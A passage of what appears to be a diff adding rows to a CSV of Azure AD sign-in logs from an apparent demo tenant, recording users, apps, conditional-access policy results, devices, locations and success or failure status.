token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ace1d4a5-fd0b-463d-bfa6-011c97aa0f00,SigninLogs,Sucess,50.6406517,5.572050095
+787,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:54.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b42afebf-6e0c-42de-bf29-8af4e328d73d,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",028ee73f-e71d-464b-b4fd-9db21bd30c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,028ee73f-e71d-464b-b4fd-9db21bd30c00,SigninLogs,Sucess,50.6406517,5.572050095
+788,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:57.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,e6b6e92d-8fef-4931-957a-03f9f23b11ce,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,[],notApplied,09/04/2020 08:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",852b7259-19f0-4fe6-8658-d6f543e05200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",e6b6e92d-8fef-4931-957a-03f9f23b11ce,e6b6e92d-8fef-4931-957a-03f9f23b11ce,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,852b7259-19f0-4fe6-8658-d6f543e05200,SigninLogs,Failed,32.32146072,34.85319901
+789,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:16.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f7bc57bb-7b0d-4210-9e16-566cd12f6f73,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 08:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f677c811-7d36-4500-96e1-658218d80e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f677c811-7d36-4500-96e1-658218d80e00,SigninLogs,Sucess,50.6406517,5.572050095
+790,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:34.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,07001dd2-58da-43da-a516-77bc3ad5ce02,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f22e123a-cab3-4cb1-81e0-9a3b9de70e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f22e123a-cab3-4cb1-81e0-9a3b9de70e00,SigninLogs,Sucess,50.6406517,5.572050095
+791,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:05.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f7bc57bb-7b0d-4210-9e16-566cd12f6f73,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 08:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",028ee73f-e71d-464b-b4fd-9db2ccd30c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,028ee73f-e71d-464b-b4fd-9db2ccd30c00,SigninLogs,Sucess,50.6406517,5.572050095
+792,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:58.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a6197525-44e0-4706-8a05-f4db944a1613,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f677c811-7d36-4500-96e1-6582ffd60e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f677c811-7d36-4500-96e1-6582ffd60e00,SigninLogs,Sucess,50.6406517,5.572050095
+793,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:59.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:22,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",a2a6e458-53e2-4dc3-905e-f03ea5720700,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a2a6e458-53e2-4dc3-905e-f03ea5720700,SigninLogs,Sucess,51.4458313,-0.969720006
+794,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:15.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,47115745-d65d-468b-a6b2-cf157dade907,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",54b59d3d-5e95-40b7-b10b-4324a0380d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,54b59d3d-5e95-40b7-b10b-4324a0380d00,SigninLogs,Sucess,36.6404686,-78.26995087
+795,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:46.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,df7bb03d-9e9f-40b8-9fd8-4b067b91f85b,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 